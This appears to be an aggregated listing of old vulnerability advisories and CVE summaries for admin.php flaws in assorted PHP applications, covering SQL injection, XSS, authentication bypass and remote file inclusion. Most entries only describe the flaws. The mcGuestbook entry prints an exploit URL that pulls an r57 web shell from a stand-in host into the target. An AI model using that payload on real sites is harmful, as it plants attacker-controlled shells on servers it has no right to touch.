CVE-2006-4328
SQL injection vulnerability in admin.php in CloudNine Interactive Links Manager 2006-06-12, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the nick parameter...
[Full-disclosure] SmartSiteCMS v1.0 authentication bypass
SmartSiteCMS v1.0 authentication bypass STATUS: I contacted the vendor more than 2 months ago and still no response. TECHNICAL INFO ================================================================ One of the worst cms I've ever seen regarding security, no input sanitation at all. Bypassing...
CVE-2006-3963
Multiple SQL injection vulnerabilities in Banex PHP MySQL Banner Exchange 2.21 allow remote attackers to execute arbitrary SQL commands via the (1) sitename parameter to (a) signup.php, and the (2) id, (3) deleteuserbanner, (4) viewmem, (5) viewmemunb, (6) viewunmem, or (7) deleteuser parameters to (b) admin.php...
mospray.txt
Kurdish Security MoSpray Remote File Include Vulnerability Original Advisory : http://kurdishsecurity.blogspot.com/2006/07/kurdish-security-14-mospray-basedir.html Freedom For Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com Risk : High Class : Remote Script : MoSpray Site :...
SQL-Injection in Shop-Script PRO & Shop-Script Premium all version
Advisory: SQL-Injection in Shop-Script PRO & Shop-Script Premium all version. Home Page: http://shop-script.ru Vulnerability: SQL injection in the administration area. Vulnerable script: admin.php...
CVE-2006-3323
PHP remote file inclusion vulnerability in admin/admin.php in MF Piadas 1.0 allows remote attackers to execute arbitrary PHP code via the page parameter. NOTE: the same vector can be used for cross-site scripting, but CVE analysis suggests that this is resultant from file inclusion of HTML or...
CVE-2006-3323
MF Piadas 1.0 is affected by a PHP remote file inclusion in admin/admin.php, exploitable via the page parameter to execute arbitrary code. The underlying issue is a file inclusion vulnerability (HTML/script vector noted as related by CVE analysis). Connected advisories also reference cross-site s...
file include exploits in mcGuestbook 1.3
Multiple file include exploits in mcGuestbook 1.3 script type : mcGuestbook 1.3 bug found by : sweet-devil team : site-down type : file include exploits : admin.php http://www.example.com/path/admin.php?lang=http://yoursite/r57shell.txt? ecrire.php...
Cross site scripting
Cross-site scripting (XSS) vulnerability in admin.php in Particle Links 1.2.2 allows remote attackers to inject arbitrary web script or HTML via the username parameter...
CVE-2006-2903
CVE-2006-2903 describes a cross-site scripting (XSS) vulnerability in Particle Links 1.2.2, specifically in admin.php where the username parameter can be exploited to inject arbitrary script/HTML. The available references (e.g., NVD entry) list a low severity (CVSS v2 base 2.6) with network attac...
BloggIT <= 1.01 (admin.php) Arbitrary code execution
/ Federico Fazzi, [email protected] / BloggIT <= 1.01 admin.php Arbitrary code execution / 04/06/2006 5:48 Bug: The BloggIT have on the admin.php: require("session.inc.php"); //- session_start(); //- if ($_SESSION['login'] != "ok") header("Location: index.php"); and require function don't include the fil...
CVE-2005-2466
OpenBook 1.2.2 is affected by multiple SQL injection vulnerabilities in the auth_user function of admin.php, allowing remote attackers to execute arbitrary SQL commands via the (1) username or (2) password parameter. The vulnerability is detailed in CVE-2005-2466 with an NVD base score of 6.4 (MED...
PT-2006-3777 · Mybloggie · Mybloggie
Name of the Vulnerable Software and Affected Versions: MyBloggie versions 2.1.1 and earlier Description: A remote file inclusion issue allows remote attackers to execute arbitrary PHP code via a URL in the mybloggie root path parameter to admin.php. The issue's validity has been disputed, with so...
Remote file inclusion
PHP remote file inclusion vulnerability in Fastpublish CMS 1.6.9.d allows remote attackers to include arbitrary files via the configfsBase parameter in (1) drucken.php, (2) drucken2.php, (3) emailanbenutzer.php, (4) rechnung.php, (5) suche/search.php and (6) adminbereich/admin.php...
CVE-2006-2726
PHP remote file inclusion vulnerability in Fastpublish CMS 1.6.9.d allows remote attackers to include arbitrary files via the configfsBase parameter in (1) drucken.php, (2) drucken2.php, (3) emailanbenutzer.php, (4) rechnung.php, (5) suche/search.php and (6) adminbereich/admin.php...
CVE-2006-2635
Multiple cross-site scripting (XSS) vulnerabilities in Tikiwiki (aka Tiki CMS/Groupware) 1.9.x allow remote attackers to inject arbitrary web script or HTML via malformed nested HTML tags such as "ipt" in (1) offset and (2) days parameters in (a) tiki-lastchanges.php, the (3) find and (4) offset parameters in ...
CVE-2006-2566
Alstrasoft Article Manager Pro 1.6 allows remote attackers to obtain sensitive information via (1) a quote character or possibly an invalid value in the action parameter in a request to mrarticles.php or (2) a login QUERYSTRING to admin.php without any additional parameters, which reveal the path in...